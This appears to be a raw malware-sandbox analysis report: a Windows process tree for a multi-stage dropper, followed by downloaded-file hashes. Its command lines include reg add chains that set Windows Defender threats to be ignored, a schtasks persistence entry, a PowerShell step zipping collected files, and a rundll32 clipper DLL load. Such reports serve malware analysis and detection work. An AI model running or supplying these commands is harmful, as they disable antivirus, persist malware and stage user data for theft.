                                                                                                                                    powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                    5⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:2436
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
                                                                                                                                3⤵
                                                                                                                                  PID:2912
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                    4⤵
                                                                                                                                      PID:4788
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                                                                                                                                        5⤵
                                                                                                                                          PID:5548
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                                                                                                                                          5⤵
                                                                                                                                            PID:5560
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 336
                                                                                                                                          4⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:5204
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                                                                                                        3⤵
                                                                                                                                          PID:3696
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
                                                                                                                                          3⤵
                                                                                                                                            PID:6096
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                                                                                                                                              4⤵
                                                                                                                                                PID:4992
                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                  Sc stop GameServerClient
                                                                                                                                                  5⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:1880
                                                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                  GameService remove GameServerClient confirm
                                                                                                                                                  5⤵
                                                                                                                                                    PID:6028
                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    Sc delete GameSyncLink
                                                                                                                                                    5⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:5716
                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                    GameService remove GameSyncLink confirm
                                                                                                                                                    5⤵
                                                                                                                                                      PID:1940
                                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                      GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4116
                                                                                                                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                        GameService start GameSyncLink
                                                                                                                                                        5⤵
                                                                                                                                                          PID:5412
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                                                                                                                                                        4⤵
                                                                                                                                                          PID:3456
                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                            Sc stop GameServerClientC
                                                                                                                                                            5⤵
                                                                                                                                                            • Launches sc.exe
                                                                                                                                                            PID:2912
                                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                            GameService remove GameServerClientC confirm
                                                                                                                                                            5⤵
                                                                                                                                                              PID:6296
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5852
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
                                                                                                                                                              4⤵
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:4580
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000241001\ISetup8.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000241001\ISetup8.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2920
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\u294.0.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\u294.0.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5480
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 1016
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:6460
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\u294.1.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\u294.1.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:3132
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1524
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:1456
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000242001\toolspub1.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1000242001\toolspub1.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5336
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000243001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3000
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -nologo -noprofile
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:3712
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000095001\angelfederal.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000095001\angelfederal.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:6072
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k move Less Less.cmd & Less.cmd & exit
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4316
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4684 -ip 4684
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:452
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2912 -ip 2912
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:2688
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:8
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5872
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1728 -ip 1728
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5896
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:1236
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4968
                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3888
                                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                                    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1112
                                                                                                                                                                                      • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                                                        "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:1660
                                                                                                                                                                                          • C:\Windows\Temp\687666.exe
                                                                                                                                                                                            "C:\Windows\Temp\687666.exe" --list-devices
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2728
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5308 -ip 5308
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4672
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2920 -ip 2920
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:232
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS1A35.tmp\Install.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zS1A35.tmp\Install.exe it /BVodidpVau 385118 /S
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1392
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2764
                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:6820
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:6996
                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:6668
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:6828
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:2888
                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5816
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3912
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS1A35.tmp\Install.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7zS1A35.tmp\Install.exe it /BVodidpVau 385118 /S
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:6200
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:6748
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:6552
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:6680
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5480 -ip 5480
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:6348

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\ProgramData\Are.docx

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          11KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                                        • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          593KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                        • C:\ProgramData\nss3.dll

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          3a6bad9528f8e23fb5c77fbd81fa28e8

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          f127317c3bc6407f536c0f0600dcbcf1aabfba36

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          970747403ac8b70edfbfe57c1d007276

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          39d5a1763ff8901d27e75e91493d416319817fb0

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          50436d0a97921514972677573da8d808407e42be73f9221472e9a85ee65b2200

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          44fa98b132688cf9ee17c931ed111ce8f074b7f6571a02f9e2f717d0d7ac2fa1fd0cb9a40c6ef7dd300ce5f6b9980e6a69e668475bb6184ad8d90b70d918687e

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          321KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          1c7d0f34bb1d85b5d2c01367cc8f62ef

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          33aedadb5361f1646cffd68791d72ba5f1424114

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          8510bcf5bc264c70180abe78298e4d5b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          2c3a2a85d129b0d750ed146d1d4e4d6274623e28

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          158KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          586f7fecacd49adab650fae36e2db994

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          35d9fb512a8161ce867812633f0a43b042f9a5e6

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          405KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          4c03ddbf5fe9e55346e426b78c9a9b2c

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e8ad3b30d021822fe4c9f6d9c3645bd712224ee7

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          9abc493c5e467667890933b0663370797734fb625cc0fa80f59195606315bbf77c4f4882b20f5c4b1f999dbfb397bacd65c992ef071b21a076b056a55431e325

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          564KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          f15a9cfa3726845017a7f91abe0a14f7

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          5540ae40231fe4bf97e59540033b679dda22f134

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          2dec75328413d4c278c119db42920fb183a88a5398d56ecc80c8cc74fba13071

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          1c2af9608736ad6a02d093f769fe5ec5a06cb395a639e021d4ee3f6c46cebc8c101e7db1064984f801ad3bee65d81b95fe6e2e60c0ec949bb172ba9c455b9869

